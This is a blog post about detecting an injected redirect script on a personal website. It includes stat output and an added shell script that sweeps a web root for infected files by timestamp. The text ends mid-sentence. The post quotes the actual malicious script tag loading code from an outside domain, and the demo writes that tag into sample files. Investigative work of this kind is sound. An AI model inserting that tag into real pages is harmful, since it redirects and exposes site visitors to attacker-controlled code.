Because this is a website on the Internet, it was only a matter of time before it was attacked. WordPress and blog sites are notorious targets for infections that append code to HTML files and redirect visitors to malicious or advertising websites. My website was affected the same way last month. Here is how the issue was identified and fixed within a few minutes of being notified.
Notification came by way of Twitter, when a friend let me know that my site was redirecting somewhere else. I was sitting at my desk and quickly opened it to verify. Sure enough, it was:
Malware infection shown to visitors
I SSH'd into the system and immediately changed the password. Then I started looking for the culprit. The main file causing the redirection was 'books.htm', in my web root folder: a simple HTML page that just lists the book projects I've worked on.
The first thing I did was manually view the file to see the impact. A line of code had been added at the very beginning of the file:
<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>
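Viewing one file by hand finds one infection. An attacker's script usually touches every HTML file it can write to, so the useful follow-up is a sweep of the whole web root for the same injected tag, with the modification and change times of every hit lined up side by side. The shell script below is an added example and not the commands from the original post; the web root path, the indicator string and the sample files it builds are all constructed for the demonstration, and the timestamp calls use GNU coreutils 'stat -c' (Linux).

```shell
#!/bin/sh
# Added example, not the commands from the original post: sweep a web root
# for files carrying the injected <script> tag and line up their timestamps,
# so one pass replaces a file-by-file 'stat'. The web root, the indicator
# string and the sample files below are assumptions/constructed inputs.
# Timestamp calls use GNU coreutils 'stat -c' (Linux); on BSD/macOS
# substitute 'stat -f %m' / 'stat -f %c'.

# find_injected WEBROOT INDICATOR
# Print (sorted) every .htm/.html/.php file under WEBROOT that contains the
# fixed string INDICATOR. -F keeps '.' and '?' in a URL from acting as regex.
find_injected() {
    find "$1" -type f \( -name '*.htm' -o -name '*.html' -o -name '*.php' \) \
        -exec grep -lF -- "$2" {} + | sort
}

# count_injected WEBROOT INDICATOR
# Number of infected files, as a bare integer.
count_injected() {
    find_injected "$1" "$2" | wc -l | tr -d ' '
}

# report_times WEBROOT INDICATOR
# One line per infected file: mtime, ctime (both epoch seconds) and the path.
# Identical mtimes across many files point at a single automated pass.
report_times() {
    find_injected "$1" "$2" | while IFS= read -r f; do
        printf '%s %s\n' "$(stat -c '%Y %Z' "$f")" "$f"
    done
}

# files_in_window WEBROOT REF_FILE SECONDS
# Every file under WEBROOT whose mtime lies within SECONDS of REF_FILE's
# mtime, infected or not: the set of files touched in the same sweep.
files_in_window() {
    ref_m=$(stat -c '%Y' "$2")
    find "$1" -type f | while IFS= read -r f; do
        d=$(( $(stat -c '%Y' "$f") - ref_m ))
        if [ "$d" -lt 0 ]; then d=$(( -d )); fi
        if [ "$d" -le "$3" ]; then printf '%s\n' "$f"; fi
    done | sort
}

# make_demo_root
# Build a throwaway web root (constructed sample data) with two files that
# carry the same injected tag and one clean file, dated like the post's
# 'stat' output. touch can set mtime but not ctime, so ctime reads as now.
make_demo_root() {
    root=$(mktemp -d)
    tag='<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>'
    printf '%s\n<html><body>Books</body></html>\n' "$tag" > "$root/books.htm"
    printf '%s\n<html><body>Home</body></html>\n'  "$tag" > "$root/index.htm"
    printf '<html><body>About</body></html>\n'            > "$root/about.htm"
    touch -t 201104022335.38 "$root/books.htm" "$root/index.htm"
    touch -t 201007190710.46 "$root/about.htm"
    printf '%s\n' "$root"
}

# Stand-alone run: scan the web root given as $1, or the constructed demo root.
scan_root="${1:-$(make_demo_root)}"
report_times "$scan_root" 'globalpoweringgathering.com'
```

Run it as `sh sweep.sh /path/to/webroot` against a real document root; with no argument it scans the constructed demo root. The files_in_window function is the part worth keeping around: once one infected file gives you a modification time, it lists everything else written in the same minute, which catches dropped PHP backdoors and modified files that do not contain the indicator string at all.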
With the infection spotted, I checked the file's MAC times to see when the attack occurred:
$ stat books.htm
  File: `books.htm'
  Size: 1500        Blocks: 8          IO Block: 4096   regular file
Device: 811h/2065d  Inode: 275324414   Links: 1
Access: (0664/-rw-rw-r--)  Uid: (10369090/ bbaskin)   Gid: (45673/pg144238)
Access: 2010-07-19 07:10:46.000000000 -0700
Modify: 2011-04-02 23:35:38.000000000 -0700
Change: 2011-04-02 23:35:38.000000000 -0700
The stat output shows that the file's modify (mtime) and change (ctime) timestamps both read 11:35:38 PM on April 2nd (Pacific time, per the -0700 offset), so the content was written and the inode updated in the same instant. This is only one file, so we need to compare against another file to verify the date and time. A quick spot check turned up an additional HTM file with the infection: